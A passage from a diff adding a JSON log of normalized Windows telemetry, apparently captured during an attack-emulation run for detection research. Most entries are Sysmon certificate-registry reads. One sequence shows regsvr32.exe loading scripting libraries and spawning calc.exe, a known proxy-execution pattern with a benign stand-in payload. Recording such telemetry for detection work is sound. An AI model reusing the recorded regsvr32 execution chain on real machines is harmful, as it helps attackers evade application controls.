"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wshom.ocx", + "image_path": "C:\\Windows\\System32\\wshom.ocx", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\Windows\\System32\\calc.exe\" ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "regsvr32.exe", + "parent_process_path": "C:\\Windows\\System32\\regsvr32.exe", + "pid": 4724, + "ppid": 2012, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "subtype": "create", + "timestamp": 131883573241160000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}", + "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "scrrun.dll", + "image_path": "C:\\Windows\\System32\\scrrun.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "MpClient.dll", + "image_path": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpClient.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "process", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "terminate", + "timestamp": 131883573241369984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + 